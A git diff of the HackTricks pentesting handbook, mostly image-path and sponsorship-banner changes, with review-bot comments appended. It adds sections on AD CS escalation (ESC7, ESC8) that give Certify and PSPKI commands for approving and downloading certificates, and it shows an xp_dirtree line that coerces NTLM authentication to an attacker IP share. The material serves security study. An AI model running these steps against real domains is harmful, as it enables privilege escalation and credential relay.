advanced** community tools.\ diff --git a/pentesting-web/race-condition.md b/pentesting-web/race-condition.md index 9f7f87a6..05ca5a25 100644 --- a/pentesting-web/race-condition.md +++ b/pentesting-web/race-condition.md @@ -1,7 +1,7 @@ # Race Condition {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ 
@@ -125,7 +125,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/pentesting-web/rate-limit-bypass.md b/pentesting-web/rate-limit-bypass.md index 6466eff3..a7124a9a 100644 --- a/pentesting-web/rate-limit-bypass.md +++ b/pentesting-web/rate-limit-bypass.md @@ -1,7 +1,7 @@ # Rate Limit Bypass {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -84,7 +84,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/pentesting-web/xs-search.md b/pentesting-web/xs-search.md index 7a313102..36cfb684 100644 --- a/pentesting-web/xs-search.md +++ b/pentesting-web/xs-search.md @@ -1,7 +1,7 @@ # XS-Search {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -84,7 +84,7 @@ You can access the tool in [https://xsinator.com/](https://xsinator.com/) {% endhint %} {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ 
@@ -196,7 +196,7 @@ You can perform the same attack with **`portal`** tags. Applications often use [postMessage broadcasts](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage) to share information with other origins. Listening to this messages one could find **sensitive info** (potentially if the the `targetOrigin` param is not used). Also, the fact of receiving some message can be **used as an oracle** (you only receive this kind of message if you are logged in). {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -278,7 +278,7 @@ Browsers use sockets to communicate with servers. As the operating system and th For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -817,7 +817,7 @@ In an execution timing it's possible to **eliminate** **network factors** to obt * **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ 
@@ -935,7 +935,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/windows-hardening/active-directory-methodology/ad-certificates.md b/windows-hardening/active-directory-methodology/ad-certificates.md index 05df8093..61366629 100644 --- a/windows-hardening/active-directory-methodology/ad-certificates.md +++ b/windows-hardening/active-directory-methodology/ad-certificates.md @@ -184,13 +184,13 @@ During certificate authentication, the DC can then verify that the authenticatin Schannel is the security support provider (SSP) Windows leverages when establishing TLS/SSL connections. Schannel supports **client authentication** (amongst many other capabilities), enabling a remote server to **verify the identity of the connecting user**. It accomplishes this using PKI, with certificates being the primary credential.\ During the **TLS handshake**, the server **requests a certificate from the client** for authentication. The client, having previously been issued a client authentication certificate from a CA the server trusts, sends its certificate to the server. The **server then validates** the certificate is correct and grants the user access assuming everything is okay. -
+
When an account authenticates to AD using a certificate, the DC needs to somehow map the certificate credential to an AD account. **Schannel** first attempts to **map** the **credential** to a **user** account use Kerberos’s **S4U2Self** functionality. \ If that is **unsuccessful**, it will follow the attempt to map the **certificate to a user** account using the certificate’s **SAN extension**, a combination of the **subject** and **issuer** fields, or solely from the issuer. By default, not many protocols in AD environments support AD authentication via Schannel out of the box. WinRM, RDP, and IIS all support client authentication using Schannel, but it **requires additional configuration**, and in some cases – like WinRM – does not integrate with Active Directory.\ One protocol that does commonly work – assuming AD CS has been setup - is **LDAPS**. The cmdlet `Get-LdapCurrentUser` demonstrates how one can authenticate to LDAP using .NET libraries. The cmdlet performs an LDAP “Who am I?” extended operation to display the currently authenticating user: -
+
## AD CS Enumeration diff --git a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md index 8a729dab..7431ded1 100644 --- a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md +++ b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md @@ -188,6 +188,100 @@ If you find this setting in your environment, you can **remove this flag** with: certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2 ``` +## Vulnerable Certificate Authority Access Control - ESC7 + +A certificate authority itself has a **set of permissions** that secure various **CA actions**. These permissions can be access from `certsrv.msc`, right clicking a CA, selecting properties, and switching to the Security tab: + +
+ +This can also be enumerated via [**PSPKI’s module**](https://www.pkisolutions.com/tools/pspki/) with `Get-CertificationAuthority | Get-CertificationAuthorityAcl`: + +```bash +Get-CertificationAuthority -ComputerName dc.theshire.local | Get-certificationAuthorityAcl | select -expand Access +``` + +The two main rights here are the **`ManageCA`** right and the **`ManageCertificates`** right, which translate to the “CA administrator” and “Certificate Manager”. + +If you have a principal with **`ManageCA`** rights on a **certificate authority**, we can use **PSPKI** to remotely flip the **`EDITF_ATTRIBUTESUBJECTALTNAME2`** bit to **allow SAN** specification in any template ([ECS6](domain-escalation.md#editf\_attributesubjectaltname2-esc6)): + +
+ +
+ +This is also possible in a simpler form with [**PSPKI’s Enable-PolicyModuleFlag**](https://www.sysadmins.lv/projects/pspki/enable-policymoduleflag.aspx) cmdlet. + +The **`ManageCertificates`** rights permits to **approve a pending request**, therefore bypassing the "CA certificate manager approval" protection. + +You can use a **combination** of **Certify** and **PSPKI** module to request a certificate, approve it, and download it: + +```powershell +# Request a certificate that will require an approval +Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:ApprovalNeeded +[...] +[*] CA Response : The certificate is still pending. +[*] Request ID : 336 +[...] + +# Use PSPKI module to approve the request +Import-Module PSPKI +Get-CertificationAuthority -ComputerName dc.theshire.local | Get-PendingRequest -RequestID 336 | Approve-CertificateRequest + +# Download the certificate +Certify.exe download /ca:dc.theshire.local\theshire-DC-CA /id:336 +``` + +## NTLM Relay to AD CS HTTP Endpoints – ESC8 + +{% hint style="info" %} +In summary, if an environment has **AD CS installed**, along with a **vulnerable web enrollment endpoint** and at least one **certificate template published** that allows for **domain computer enrollment and client authentication** (like the default **`Machine`** template), then an **attacker can compromise ANY computer with the spooler service running**! +{% endhint %} + +AD CS supports several **HTTP-based enrollment methods** via additional AD CS server roles that administrators can install. These HTTPbased certificate enrollment interfaces are all **vulnerable NTLM relay attacks**. Using NTLM relay, an attacker on a **compromised machine can impersonate any inbound-NTLM-authenticating AD account**. While impersonating the victim account, an attacker could access these web interfaces and **request a client authentication certificate based on the `User` or `Machine` certificate templates**. 
+ +* The **web enrollment interface** (an older looking ASP application accessible at `http:///certsrv/`), by default only supports HTTP, which cannot protect against NTLM relay attacks. In addition, it explicitly only allows NTLM authentication via its Authorization HTTP header, so more secure protocols like Kerberos are unusable. +* The **Certificate Enrollment Service** (CES), **Certificate Enrollment Policy** (CEP) Web Service, and **Network Device Enrollment Service** (NDES) support negotiate authentication by default via their Authorization HTTP header. Negotiate authentication **support** Kerberos and **NTLM**; consequently, an attacker can **negotiate down to NTLM** authentication during relay attacks. These web services do at least enable HTTPS by default, but unfortunately HTTPS by itself does **not protect against NTLM relay attacks**. Only when HTTPS is coupled with channel binding can HTTPS services be protected from NTLM relay attacks. Unfortunately, AD CS does not enable Extended Protection for Authentication on IIS, which is necessary to enable channel binding. + +Common **problems** with NTLM relay attacks are that the **NTLM sessions are usually short** and that the attacker **cannot** interact with services that **enforce NTLM signing**. + +However, abusing a NTLM relay attack to obtain a certificate to the user solves this limitations, as the session will live as long as the certificate is valid and the certificate can be used to use services **enforcing NTLM signing**. To know how to use an stolen cert check: + +{% content-ref url="account-persistence.md" %} +[account-persistence.md](account-persistence.md) +{% endcontent-ref %} + +Another limitation of NTLM relay attacks is that they **require a victim account to authenticate to an attacker-controlled machine**. 
An attacker could wait or could try to **force** it: + +{% content-ref url="../printers-spooler-service-abuse.md" %} +[printers-spooler-service-abuse.md](../printers-spooler-service-abuse.md) +{% endcontent-ref %} + +****[**Certify**](https://github.com/GhostPack/Certify)’s `cas` command can enumerate **enabled HTTP AD CS endpoints**: + +``` +Certify.exe cas +``` + +
+ +Enterprise CAs also **store CES endpoints** in their AD object in the `msPKI-Enrollment-Servers` property. **Certutil.exe** and **PSPKI** can parse and list these endpoints: + +``` +certutil.exe -enrollmentServerURL -config CORPDC01.CORP.LOCAL\CORP-CORPDC01-CA +``` + +
+ +```powershell +Import-Module PSPKI +Get-CertificationAuthority | select Name,Enroll* | Format-List * +``` + +
+ +## References + +* All the information for this page was taken from [https://www.specterops.io/assets/resources/Certified\_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified\_Pre-Owned.pdf) +
Support HackTricks and get benefits! diff --git a/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md b/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md new file mode 100644 index 00000000..a299b0f4 --- /dev/null +++ b/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md @@ -0,0 +1,39 @@ +# Domain Persistence + +
+ +Support HackTricks and get benefits! + +Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! + +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) + +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) + +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** + +**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
+ + + + + + + +
+ +Support HackTricks and get benefits! + +Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! + +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) + +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) + +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** + +**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
diff --git a/windows-hardening/active-directory-methodology/dcsync.md b/windows-hardening/active-directory-methodology/dcsync.md index 218bde9f..f2725b8e 100644 --- a/windows-hardening/active-directory-methodology/dcsync.md +++ b/windows-hardening/active-directory-methodology/dcsync.md @@ -1,7 +1,7 @@ # DCSync {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -45,7 +45,7 @@ Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveG ``` {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -106,7 +106,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
{% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md b/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md index 599b2679..ed3fc042 100644 --- a/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md +++ b/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md @@ -87,13 +87,13 @@ In the previous flow it was used the trust hash instead of the **clear text pass The cleartext password can be obtained by converting the \[ CLEAR ] output from mimikatz from hexadecimal and removing null bytes ‘\x00’: -![](<../../.gitbook/assets/image (2) (1).png>) +![](<../../.gitbook/assets/image (2) (1) (2).png>) Sometimes when creating a trust relationship, a password must be typed in by the user for the trust. In this demonstration, the key is the original trust password and therefore human readable. As the key cycles (30 days), the cleartext will not be human-readable but technically still usable. The cleartext password can be used to perform regular authentication as the trust account, an alternative to requesting a TGT using the Kerberos secret key of the trust account. Here, querying root.local from ext.local for members of Domain Admins: -![](<../../.gitbook/assets/image (1) (1).png>) +![](<../../.gitbook/assets/image (1) (1) (2).png>) ## References diff --git a/windows-hardening/active-directory-methodology/kerberoast.md b/windows-hardening/active-directory-methodology/kerberoast.md index 805a6cc0..ec1e327d 100644 --- a/windows-hardening/active-directory-methodology/kerberoast.md +++ b/windows-hardening/active-directory-methodology/kerberoast.md 
@@ -1,7 +1,7 @@ # Kerberoast {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -77,7 +77,7 @@ When a TGS is requested, Windows event `4769 - A Kerberos service ticket was req {% endhint %} {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -144,7 +144,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md b/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md index 71333f81..ae4dfb8e 100644 --- a/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md +++ b/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md @@ -87,6 +87,8 @@ C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -S EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1 ``` +Or use this other technique: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce) + ## HTML injection ### Via email diff --git a/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md b/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md index f7087b03..ea7c3db0 100644 --- a/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md 
+++ b/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md @@ -1,7 +1,7 @@ # ACLs - DACLs/SACLs/ACEs {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -83,7 +83,7 @@ The canonical order ensures that the following takes place: * All **explicit ACEs are processed before any inherited ACE**. This is consistent with the concept of discretionary access control: access to a child object (for example a file) is at the discretion of the child's owner, not the owner of the parent object (for example a folder). The owner of a child object can define permissions directly on the child. The result is that the effects of inherited permissions are modified. {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -209,7 +209,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
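Review bot: the new ESC7/ESC8 text added to `domain-escalation.md` carries a wrong cross-reference label and several wording errors that should be fixed before merge: the link text `[ECS6](domain-escalation.md#editf_attributesubjectaltname2-esc6)` should read `ESC6`; "can be access from `certsrv.msc`" should be "can be accessed from"; "HTTPbased" should be "HTTP-based"; "are all **vulnerable NTLM relay attacks**" is missing "to"; "Negotiate authentication **support** Kerberos and **NTLM**" should be "supports"; "solves this limitations" should be "solves these limitations" and "an stolen cert" should be "a stolen cert"; and "The **`ManageCertificates`** rights permits to **approve a pending request**" reads better as "The `ManageCertificates` right permits approving a pending request". Two smaller consistency points in the same hunk: the example `Get-CertificationAuthority -ComputerName dc.theshire.local | Get-certificationAuthorityAcl` uses a lowercase `c` where the prose one line earlier writes `Get-CertificationAuthorityAcl`, and the web enrollment URL `http:///certsrv/` has lost its host, so a visible placeholder such as `http://<CA_HOST>/certsrv/` would avoid readers copying an invalid URL; the stray `****` preceding the Certify link will also render as empty bold. Finally, the ESC8 paragraph names the missing protection (Extended Protection for Authentication / channel binding on the IIS endpoints) but never states the remediation; one closing sentence telling defenders to enable EPA and require HTTPS on the enrollment endpoints, or to remove the web enrollment roles where they are not needed, would make the section actionable for both audiences.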
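Review bot: the new file `windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md` is an empty placeholder: it contains only the `# Domain Persistence` heading, the sponsorship banner at the top and the same banner again at the bottom, with nothing but blank lines between them. Either add the intended content (or at least a `content-ref` to the page it should cover) before merging, or hold the file back so the book does not ship a page with a title and no body.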
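Review bot: the bulk of this patch repoints every `![](../.gitbook/assets/image.png)` banner reference to `![](<../.gitbook/assets/image (1).png>)` because the binary assets were renumbered (`image.png`, `image (1).png`, `image (2) (1).png` and others all change content here, with new `(2)` copies added), and `external-forest-domain-one-way-outbound.md` likewise moves from `image (2) (1).png` to `image (2) (1) (2).png`. Any page that references one of the re-indexed names but is not in this diff now shows a different picture, so before merging please grep the repo for remaining references to `image.png`, `image (1) (1).png`, `image (2) (1).png`, `image (70).png`, `image (73).png`, `image (78).png`, `image (8).png` and `image (81).png` and confirm each still points at the intended asset.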
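Review bot: the line added to `printers-spooler-service-abuse.md`, `Or use this other technique: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](...)`, is a bare link with no description, unlike the `EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1` example directly above it which shows what is being coerced. Add one sentence saying what the linked tool does and what access it requires, so the reader can judge whether it applies without leaving the page.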